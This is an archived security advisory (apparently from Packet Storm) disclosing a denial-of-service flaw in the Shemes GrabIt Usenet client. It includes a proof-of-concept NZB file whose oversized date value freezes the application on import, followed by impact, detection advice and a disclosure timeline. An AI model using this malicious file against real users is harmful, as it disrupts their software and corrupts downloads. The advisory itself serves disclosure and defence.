exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Shemes Grabbit NZB Date Denial Of Service

Shemes Grabbit NZB Date Denial Of Service
Posted Jul 8, 2010
Authored by Marc Ruef | Site scip.ch

Shemes Grabbit suffers from a malicious NZB file related denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | dd8f4bd253788e849c9c760e1204e9c3a0cbaaa54947b455f67903536f36ac84

Shemes Grabbit NZB Date Denial Of Service

Change Mirror Download
Shemes Grabbit Malicious NZB Date Denial of Service

scip AG Vulnerability ID 4143 (07/08/2010)
http://www.scip.ch/?vuldb.4143

I. INTRODUCTION

Grabbit is a popular freeware client for binary Usenet interaction.

More information is available on the official web site at the following URL:

http://www.shemes.com/index.php?p=download

II. DESCRIPTION

Marc Ruef at scip AG found a denial of service vulnerability in the
current release up to GrabIt 1.7.2 ßeta 4.

An attacker is able to provide a malicious nzb file which will cause a
freeze of the application.

III. EXPLOITATION

The attack requires a malicious nzb file which includes a file reference
with a very large date value. This is a simplified example:

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE nzb PUBLIC "-//newzBin//DTD NZB 1.0//EN"
"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd">
<nzb xmlns="http://www.newzbin.com/DTD/2003/nzb">

<file subject="poc" date="1000000000000000" poster="maru">
<groups><group>non.existing.group</group></groups>
<segments>
<segment number="1" bytes="42">exploit@domain.example</segment>
</segments>
</file>

</nzb>

IV. IMPACT

During the import of the malicious nzb file the application will freeze.
Further interaction with the software is not possible anymore. Ongoing
downloads will be corrupted or lost. It is required to kill the process
and to re-launch the application.

V. DETECTION

A pre-parsing of nzb files prior import might help to determine
malicious files. In this case the data value is well-defined and could
be sanitized easily.

VI. SOLUTION

No workaround or solution known at the moment.

It is suggested to use nzb files from trusted sources only or to use
another Usenet client.

VII. VENDOR RESPONSE

The issue has been reported to the vendor via the online bug tracking
system.

After exchange of technical details the vendor informed that a
re-written client will be released in the next few months.

VIII. SOURCES

scip AG - Security is our Business (german)
http://www.scip.ch

scip AG - Vulnerability Database (german)
http://www.scip.ch/?vuldb.4143

computec.ch Document Database (german)
http://www.computec.ch

IX. DISCLOSURE TIMELINE

2010/02/20 Identification of the vulnerability
2010/02/21 Notification of Shemes.com via online bug tracking
2010/02/21 Acknowledgement of the issue by Ilan
2010/02/21 Providing the PoC to verify the vulnerability
2010/04/09 Update of the current development status
2010/07/08 Public disclosure of the advisory

X. CREDITS

The vulnerability has been discovered by Marc Ruef.

Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch

A1. LEGAL NOTICES

Copyright (c) 2002-2010 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close